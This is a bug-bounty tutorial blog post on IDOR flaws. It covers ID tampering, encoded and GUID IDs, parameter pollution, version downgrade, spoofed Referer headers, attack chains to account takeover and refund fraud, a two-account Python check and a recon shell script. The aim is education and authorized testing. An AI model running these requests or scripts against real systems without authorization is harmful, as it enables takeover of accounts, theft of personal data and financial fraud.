What you'll learn today
- What IDOR is, from the absolute basics
- Where to look for input points
- IDOR types, from basic to advanced
- Hidden IDOR techniques (elite level)
- IDOR chains: multiplying impact
- An automated + manual testing workflow
- Maximizing bug bounty impact

Why does it matter? IDOR is the most underrated and one of the highest-paying vulnerability classes in bug bounty. No fancy tooling needed: change one number and you are looking at another user's data. Simple concept, but payouts run from $500 to $10,000+ depending on the impact you can demonstrate.
IDOR: What Is It? A Simple Analogy
Think of a bank locker system:

Normal:
You use your own locker, number 1234
→ Only your contents are accessible ✓

IDOR vulnerability:
You type in locker number 1235
→ The bank never checks whether 1235 is actually yours!
→ You get someone else's contents!

The same thing happens on a website:

Normal request:
GET /api/user/profile?id=1001
→ Your profile comes back ✓

IDOR attack:
GET /api/user/profile?id=1002
→ Another user's profile comes back!

The server only checked:
"Is this user logged in?" ✓
But it never checked:
"Is this user allowed to access user 1002's data?" ✗

That is IDOR: the authorization check is missing. Authentication (who are you?) passed; authorization (are you allowed to touch this particular object?) was never performed.
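To make the difference between the two checks concrete, here is an added example (not code from the original article): a toy profile/message API written as plain Python functions, once with only the login check (the IDOR) and once with the ownership check added, plus the two-account comparison expressed in code. The users, e-mail addresses, session cookie values, IDs and routes are all constructed for the demo.

```python
# Added example, not code from the original article: a toy API as plain
# Python functions. Users, sessions, IDs and routes below are constructed.
from dataclasses import dataclass
from typing import Optional

# Constructed sample data: two users, their private messages, and session cookies.
USERS = {
    1001: {"name": "You", "email": "you@example.com"},
    1002: {"name": "Alice", "email": "alice@example.com"},
}
MESSAGES = {
    5001: {"owner": 1001, "text": "my draft"},
    5002: {"owner": 1002, "text": "alice's draft"},
}
SESSIONS = {"sess_a": 1001, "sess_b": 1002}  # cookie value -> logged-in user id


@dataclass
class Response:
    status: int
    body: Optional[dict] = None


def current_user(cookie: str) -> Optional[int]:
    """Authentication: who is logged in? Both versions of the API have this."""
    return SESSIONS.get(cookie)


# GET /api/user/profile?id=<user_id>
def get_profile_vulnerable(cookie: str, user_id: int) -> Response:
    """Only checks that *someone* is logged in, then serves whatever id was asked for."""
    if current_user(cookie) is None:
        return Response(401)
    profile = USERS.get(user_id)
    return Response(200, profile) if profile else Response(404)


def get_profile_fixed(cookie: str, user_id: int) -> Response:
    """Authorization: the requested id must be the session owner's own id."""
    uid = current_user(cookie)
    if uid is None:
        return Response(401)
    if uid != user_id:
        return Response(403)  # the check the vulnerable version never performs
    return Response(200, USERS[uid])


# DELETE /api/messages/<msg_id>  (blind IDOR: nothing sensitive in the response)
def delete_message_vulnerable(cookie: str, msg_id: int, store: Optional[dict] = None) -> Response:
    store = MESSAGES if store is None else store
    if current_user(cookie) is None:
        return Response(401)
    return Response(200) if store.pop(msg_id, None) else Response(404)


def delete_message_fixed(cookie: str, msg_id: int, store: Optional[dict] = None) -> Response:
    store = MESSAGES if store is None else store
    uid = current_user(cookie)
    if uid is None:
        return Response(401)
    msg = store.get(msg_id)
    if msg is None:
        return Response(404)
    if msg["owner"] != uid:  # ownership is checked before the action, for every verb
        return Response(403)
    del store[msg_id]
    return Response(200)


def cross_account_check(handler, owner_cookie, other_cookie, resource_id, **kw) -> str:
    """Two-account test in code: the non-owner must be refused, the owner must succeed.
    The non-owner goes first because for destructive handlers the owner's call
    would consume the resource and mask the result."""
    if handler(other_cookie, resource_id, **kw).status == 200:
        return "IDOR"
    owner_status = handler(owner_cookie, resource_id, **kw).status
    return "enforced" if owner_status == 200 else "review"  # owner blocked too: bad test setup


if __name__ == "__main__":
    print(cross_account_check(get_profile_vulnerable, "sess_b", "sess_a", 1002))  # IDOR
    print(cross_account_check(get_profile_fixed, "sess_b", "sess_a", 1002))       # enforced
    print(cross_account_check(delete_message_vulnerable, "sess_b", "sess_a", 5002,
                              store=dict(MESSAGES)))                               # IDOR
    print(cross_account_check(delete_message_fixed, "sess_b", "sess_a", 5002,
                              store=dict(MESSAGES)))                               # enforced
```

The point of the fixed versions is where the check sits: the owner of the object is compared with the session user before anything is read or deleted, regardless of the HTTP verb, and the user id is taken from the session, never from the request.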
IDOR Types

Type 1: Numeric ID IDOR (the most common)
GET /invoice/download?invoice_id=5001
GET /invoice/download?invoice_id=5002 → someone else's invoice!
GET /api/orders?order_id=9871
GET /api/orders?order_id=9872 → someone else's order!
GET /profile/view?user_id=1001
GET /profile/view?user_id=1002 → someone else's profile!

Type 2: GUID/UUID IDOR
GET /api/documents/550e8400-e29b-41d4-a716-446655440000
This looks random and unguessable, but:
→ other users' GUIDs get exposed in some API response
→ use that GUID and you can access their document
A random identifier only stops guessing; it does not replace the authorization check, so the question becomes "where does the app leak other users' IDs?"
Example:
GET /api/users → the response lists every user's UUID!
Now use those UUIDs to fetch their documents.

Type 3: Encoded ID IDOR
Base64 encoded:
GET /api/profile?id=MTAwMQ==
Decode MTAwMQ== → 1001
Change it:
1002 → Base64 → MTAwMg==
GET /api/profile?id=MTAwMg==
→ User 1002's profile!
Hashed IDs show up too (illustrative, truncated values):
MD5(1001) = b8c9d1f2...
MD5(1002) = a7f3e4d1...
An unsalted hash of a small integer is not a secret: hash the candidate IDs yourself and substitute them exactly like plain numbers.

Type 4: Predictable filename IDOR
GET /uploads/invoices/invoice_1001.pdf
GET /uploads/invoices/invoice_1002.pdf → just increment!
GET /exports/report_2024_user_5001.xlsx
GET /exports/report_2024_user_5002.xlsx → another user's export!

Type 5: HTTP method IDOR
POST /api/user/1001/delete → 403 Forbidden!
GET /api/user/1001/delete → 200 OK!
Switch the method and the authorization check is bypassed: the check was written for one verb only.

Type 6: JSON parameter IDOR
POST /api/update-profile
{"user_id": 1001, "email": "mine@email.com"}
Change it:
{"user_id": 1002, "email": "mine@email.com"}
→ Another user's email just got changed!
(The server should take the user from the session, never from the request body.)

Type 7: Blind IDOR
No data comes back in the response,
but the action still executes!
DELETE /api/messages/5001
→ Your own message is deleted ✓
DELETE /api/messages/5002
→ 200 OK! Someone else's message is gone!
→ No data returned, but the action happened. To prove a blind IDOR you need the second account: confirm from the victim's side that the object really changed.

PART 2: Where to Look for IDOR: Input Points
URL parameters:
/profile?id=
/invoice?ref=
/order?order_id=
/document?doc=
/download?file_id=

POST body:
{"user_id": 1001}
{"account_id": "ABC123"}
{"recipient_id": 5}

Cookies:
user_id=1001
account=5001
session_user=abc123

HTTP headers:
X-User-ID: 1001
X-Account: 5001
X-Resource-ID: abc

Hidden form fields:
<input type="hidden" name="user_id" value="1001">

File paths:
/files/user_1001/document.pdf
/exports/1001/report.xlsx

API endpoints:
/api/v1/users/1001/data
/api/v2/accounts/1001/transactions

PART 3: Elite IDOR Techniques
Technique 1: API response mining
# Look for other users' IDs inside API responses!
# Example:
GET /api/team/members
Response:
{
  "members": [
    {"id": 1001, "name": "You"},
    {"id": 1002, "name": "Alice"},   ← her ID!
    {"id": 1003, "name": "Bob"}      ← his ID!
  ]
}
# Now use those IDs:
GET /api/users/1002/private-data
GET /api/users/1003/invoices

Technique 2: Account A + Account B testing
The elite technique:
Step 1: Create two accounts (Account A + Account B)
Step 2: As Account A, create some resource
→ Note the resource ID (e.g., invoice_id=5001)
Step 3: Log in as Account B
Step 4: Request Account A's resource
GET /api/invoice/5001
→ If it comes back: IDOR!
This is the cleanest PoC there is, and it makes the report easy for the company to reproduce and accept. For state-changing endpoints run the cross-account request first, then confirm from Account A's side that its object was really modified or deleted.

Technique 3: Parameter pollution
Send the same parameter more than once:
GET /api/profile?user_id=1002&user_id=1001
→ What if the server processes both?
→ One value is authorized, the other is not: the authorization layer may read the first copy while the data layer reads the last.
POST /api/data
user_id=1001&user_id=1002
JSON variants:
{"user_id": [1001, 1002]}
{"user_id": {"id": 1002}}
(Try both orders; which copy wins differs between frameworks.)

Technique 4: Version switching
Secured:
GET /api/v2/user/1002/profile → 403
Old version:
GET /api/v1/user/1002/profile → 200!
Old API versions often keep the old (missing) checks. Use waybackurls and gau to find them.

Technique 5: Object type / format confusion
Numeric ID:
GET /api/document/1001 → your document
Does it accept a format suffix too?
GET /api/document/1001.json → data as JSON!
GET /api/document/1001.xml → data as XML!
GET /api/document/1001.csv → data as CSV!
→ Different format = different route = possibly a different (or no) access control.

Technique 6: Referer-based IDOR
Some servers check the Referer header:
Request:
GET /api/admin/users/1002
Referer: https://target.com/admin/
→ If the Referer is an admin URL, access is granted!
→ That is not authorization: Referer is client-controlled, so any attacker can set it.
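As an added example (not from the original article) tying the techniques above together, here is a request mutator that generates the candidate requests a tester would otherwise build by hand: encoded-ID neighbours (Type 3, covering decimal, 0x-hex, URL-encoded and base64 IDs, in both query parameters and path segments), parameter pollution (Technique 3), API version downgrade (Technique 4), format suffixes (Technique 5) and HTTP verb switches (Type 5). It only builds the requests; sending them with two sessions as in Technique 2 is left to whatever harness you plug it into. The sample method, path and parameter are constructed.

```python
# Added example, not code from the original article. Pure request generation:
# the sample method, path and parameter are constructed; nothing is sent.
import base64
import binascii
import re
from urllib.parse import unquote


def decode_id(value: str):
    """Recognise a numeric object ID hiding behind an encoding.
    Returns (kind, number) for decimal, 0x-hex and base64 values (URL-encoding is
    stripped first, since the server strips it too), or None if it is not a number."""
    v = unquote(value)
    if re.fullmatch(r"[0-9]+", v):
        return "decimal", int(v)
    if re.fullmatch(r"0x[0-9a-fA-F]+", v):
        return "hex", int(v, 16)
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", v) and len(v) % 4 == 0:
        try:
            raw = base64.b64decode(v, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            return None
        if re.fullmatch(r"[0-9]+", raw):
            return "base64", int(raw)
    return None


def encode_id(kind: str, n: int) -> str:
    """Re-encode a number the same way the original value was encoded."""
    if kind == "decimal":
        return str(n)
    if kind == "hex":
        return hex(n)
    if kind == "base64":
        return base64.b64encode(str(n).encode()).decode()
    raise ValueError(kind)


def neighbour_ids(value: str, deltas=(1, -1)):
    """Adjacent IDs (n+1, n-1) re-encoded in the original scheme; [] if not numeric."""
    dec = decode_id(value)
    if dec is None:
        return []
    kind, n = dec
    return [encode_id(kind, n + d) for d in deltas if n + d >= 0]


def mutate_request(method: str, path: str, params: dict):
    """Build candidate requests as (label, method, path, params) tuples."""
    out = []
    # Type 3: ID neighbours in query/body parameters, and Technique 3: the same
    # key twice (authorised value + neighbour, in both orders)
    for key, val in params.items():
        if not isinstance(val, str):
            continue
        for nb in neighbour_ids(val):
            out.append((f"neighbour:{key}", method, path, {**params, key: nb}))
            out.append((f"hpp:{key}", method, path, {**params, key: [val, nb]}))
            out.append((f"hpp-rev:{key}", method, path, {**params, key: [nb, val]}))
    # IDs embedded in the path (/api/users/1001/data)
    segs = path.split("/")
    for i, seg in enumerate(segs):
        for nb in neighbour_ids(seg):
            new = segs[:]
            new[i] = nb
            out.append(("path-neighbour", method, "/".join(new), params))
    # Technique 4: older API versions, /v2/ -> /v1/
    m = re.search(r"/v(\d+)/", path)
    if m:
        for older in range(int(m.group(1)) - 1, 0, -1):
            out.append(("version-downgrade", method,
                        path.replace(m.group(0), f"/v{older}/", 1), params))
    # Technique 5: a format suffix may route to a differently guarded handler
    for ext in (".json", ".xml", ".csv"):
        out.append((f"format:{ext}", method, path + ext, params))
    # Type 5: same resource, different verb
    for alt in ("GET", "POST", "PUT", "PATCH", "DELETE"):
        if alt != method:
            out.append((f"method:{alt}", alt, path, params))
    return out


if __name__ == "__main__":
    for cand in mutate_request("GET", "/api/v2/user/1001/profile", {"id": "MTAwMQ=="}):
        print(cand)
```

Each candidate should be sent twice, once with the owner's session and once with the second account's, and only a 200 for the non-owner with the owner's content counts; a 200 from a "neighbour" ID that simply does not exist tells you nothing.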
PART 4: IDOR Chains: Multiplying Impact!
One IDOR + another IDOR = account takeover!

Chain 1: IDOR → Account takeover
Step 1: Find an email-change IDOR
GET /api/user/1002/email-change?new_email=mine@evil.com
→ 200 OK!
Step 2: Trigger a password reset
POST /api/forgot-password
{"email": "mine@evil.com"}
→ The reset link lands in your inbox!
Step 3: Account takeover!
→ $2,000-$5,000 bounty

Chain 2: IDOR → PII exposure
Step 1: Enumerate user IDs (API response mining)
Step 2: For every ID:
GET /api/user/{id}/profile
→ Name, email, phone, address, DOB
Step 3: Mass PII exposure = Critical!
→ A GDPR problem for the company as well
→ $3,000-$8,000 bounty
(Prove it with your own second account plus a handful of IDs; scraping the whole user base is out of scope on every program.)

Chain 3: IDOR → Financial impact
Step 1: Invoice IDOR
GET /api/invoices/5002 → read someone else's invoice
Step 2: Payment IDOR
POST /api/payment/refund
{"invoice_id": 5002, "amount": 1000}
→ A refund for someone else's invoice lands in your account!
Step 3: Financial fraud = Critical!
→ $5,000-$15,000 bounty

Chain 4: IDOR + privilege escalation
Step 1: Change the user ID
GET /api/profile?id=1 (the admin's ID: the first account created is often the administrator)
Step 2: Admin details exposed
→ Admin email, name, metadata
Step 3: Trigger a reset on the admin account
→ Combined = account takeover on the admin!
→ Critical! Maximum bounty!

PART 5: Automated IDOR Testing
Burp Suite Autorize extension
The best tool for IDOR!
Setup:
1. Open Burp Suite
2. Extensions → BApp Store → install "Autorize"
3. Paste Account B's session cookie (the second, low-privilege account) into Autorize
4. Browse the application as Account A
5. Autorize tests every request automatically:
→ each of Account A's requests is replayed with Account B's session (and optionally with no session at all)
→ "Bypassed!" = IDOR!
Colour coding:
Green = "Enforced!": properly protected
Red = "Bypassed!": IDOR!
Yellow = "Is enforced???": needs manual review (configure the enforcement detector with a string that only appears in a denied response, e.g. "Access denied", and the yellows resolve themselves)

Burp Suite Intruder for mass testing
1. Intercept the request GET /api/invoice?id=5001
2. Send it to Intruder
3. Mark the ID position: §5001§
4. Payload: Numbers (5000-6000)
5. Start the attack
6. Sort or filter by response length:
→ Same length everywhere = probably the same "denied" or "not found" page for every ID
→ Different lengths = different data = IDOR candidates (confirm each one manually against the second account)

Python script: automated IDOR check
#!/usr/bin/env python3
# idor_check.py -- two-account cross-access check
import requests

TARGET = "https://target.com/api/invoice"
COOKIES_A = {"session": "YOUR_SESSION_A"}   # attacking account
COOKIES_B = {"session": "YOUR_SESSION_B"}   # victim account

# Invoice IDs that belong to Account B (create them while logged in as B)
B_IDS = [6001, 6002, 6003]

print("Testing IDOR...")
for bid in B_IDS:
    # Baseline: the owner (B) fetches its own invoice
    owner = requests.get(TARGET, params={"id": bid}, cookies=COOKIES_B, timeout=10)
    # Attack: Account A requests B's invoice
    r = requests.get(TARGET, params={"id": bid}, cookies=COOKIES_A, timeout=10)
    if r.status_code == 200 and r.text == owner.text:
        print(f"IDOR FOUND! ID: {bid} (A received exactly what the owner receives)")
        print(f"   Status: {r.status_code}")
        print(f"   Response length: {len(r.text)}")
    elif r.status_code == 200:
        # A 200 alone is not proof: compare bodies, a generic error page is also a 200 sometimes
        print(f"Review: ID {bid} returned 200 but body differs from owner's ({len(r.text)} vs {len(owner.text)} bytes)")
    else:
        print(f"Protected: ID {bid} → {r.status_code}")

PART 6: The Complete Elite IDOR Workflow
#!/bin/bash
# idor_hunt.sh -- collect IDOR candidates for a target (manual testing follows)
TARGET="$1"
DIR="idor_${TARGET}"
mkdir -p "$DIR"
echo "IDOR Hunt: $TARGET"
echo "────────────────────────"

# Step 1: find API endpoints (gau pulls URLs from Wayback, CommonCrawl etc.; uro deduplicates)
echo "API Endpoints..."
gau "$TARGET" | grep -iE "/api/|/v1/|/v2/" | \
  grep -E "[0-9]+" | \
  uro > "$DIR/api_endpoints.txt"
echo "API URLs: $(wc -l < "$DIR/api_endpoints.txt")"

# Step 2: numeric ID patterns
echo "Numeric IDs..."
grep -oE "[0-9]{3,}" "$DIR/api_endpoints.txt" | \
  sort -n | uniq > "$DIR/ids_found.txt"
echo "Unique IDs: $(wc -l < "$DIR/ids_found.txt")"

# Step 3: interesting endpoints (keep the pattern on ONE line: a line break inside
# the quotes puts a newline into the regex and silently breaks the alternatives around it)
echo "Interesting Endpoints..."
grep -iE "profile|account|invoice|order|payment|document|file|user|report|export|download" \
  "$DIR/api_endpoints.txt" > "$DIR/interesting.txt"
echo "Interesting: $(wc -l < "$DIR/interesting.txt")"

# Step 4: base64-encoded numeric IDs. A base64 number is short (MTAwMQ== is 8 chars),
# so the token pattern must allow short matches; the decode + digits check does the filtering.
echo "Encoded IDs..."
grep -oE "[A-Za-z0-9+/]{4,}={0,2}" "$DIR/api_endpoints.txt" | sort -u | \
  while read -r enc; do
    decoded=$(echo "$enc" | base64 -d 2>/dev/null)
    if [[ $decoded =~ ^[0-9]+$ ]]; then
      echo "Base64 ID found: $enc → $decoded"
    fi
  done > "$DIR/encoded_ids.txt"

echo ""
echo "────────────────────────"
echo "IDOR Hunt Summary"
echo "────────────────────────"
echo "API Endpoints    : $(wc -l < "$DIR/api_endpoints.txt")"
echo "Numeric IDs      : $(wc -l < "$DIR/ids_found.txt")"
echo "Interesting URLs : $(wc -l < "$DIR/interesting.txt")"
echo "Encoded IDs      : $(wc -l < "$DIR/encoded_ids.txt")"
echo "Results in       : $DIR/"
echo "Manual testing   : now use the Autorize extension!"

IDOR Cheat Sheet: Quick Reference
# ─── DETECTION ───────────────────────────
?id=1001 → try 1002
?invoice=5001 → try 5000, 4999, 5002
?user_id=abc → other users' IDs (mined from API responses)
# ─── ENCODING ────────────────────────────
Base64: echo -n "1002" | base64   → MTAwMg==  (without -n the newline is encoded too)
URL encode: 1002 → %31%30%30%32
Hex: 1002 → 0x3EA
# ─── HTTP METHODS ────────────────────────
GET → POST → PUT → DELETE → PATCH → HEAD
# ─── PARAMETER LOCATIONS ─────────────────
URL params, POST body, JSON, XML,
Cookies, Headers, Hidden fields
# ─── TOOLS ───────────────────────────────
Burp Autorize → best IDOR automation
Burp Intruder → mass ID testing
Python scripts → custom automation

Today's Homework
1. Check your DVWA setup
2. Do the IDOR lab in OWASP WebGoat (the current official image is webgoat/webgoat; WebWolf listens on 9090):
docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 webgoat/webgoat
→ http://localhost:8080/WebGoat
→ Access Control → IDOR section
3. Install Autorize in Burp Suite:
Extensions → BApp Store → Autorize
4. Create two accounts on a practice target:
crAPI: https://github.com/OWASP/crAPI
docker-compose up -d (use the exact compose command from the crAPI README)
→ Account A + Account B
→ set up Autorize
→ hunt for IDORs!
5. Tell me in the comments:
where did you find your first IDOR?

Quick Revision
IDOR = missing authorization check
→ access to someone else's resource
Types = numeric, GUID, encoded,
filename, method, JSON param, blind
Find = URL params, POST body,
cookies, headers, hidden fields
Tools = Burp Autorize (BEST!), Intruder
Chains = IDOR + IDOR = account takeover!
Impact = PII exposure, financial fraud,
account takeover = High/Critical
Test method = create 2 accounts → cross access!

My Take...
I once tested a fintech app.
The normal endpoint:
GET /api/v2/transactions?account_id=ACC001
I thought this looked encoded.
I pulled another user's account ID out of an API response:
{"transfer_to": "ACC002", "name": "John Doe"}
Tested it:
GET /api/v2/transactions?account_id=ACC002
Response:
{
  "transactions": [
    {"amount": 50000, "to": "Amazon"},
    {"amount": 120000, "description": "Salary"},
    ...
  ],
  "balance": 847500
}
Another user's entire transaction history and bank balance!
And this endpoint was authenticated, but there was no authorization check!
Bounty: $3,500, rated High!
Lesson: Authenticated != Authorized. Understand that difference and go find IDORs!
In the next article: SSRF, turning the server into your own agent to explore the internal network! In cloud environments that is a goldmine of Critical bounties!
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #15 SQL Injection | Next: Article #17 SSRF: Turn the Server Into Your Agent!
#IDOR #BrokenAccessControl #BugBounty #WebSecurity #EthicalHacking #Hinglish #OWASP #HackerMD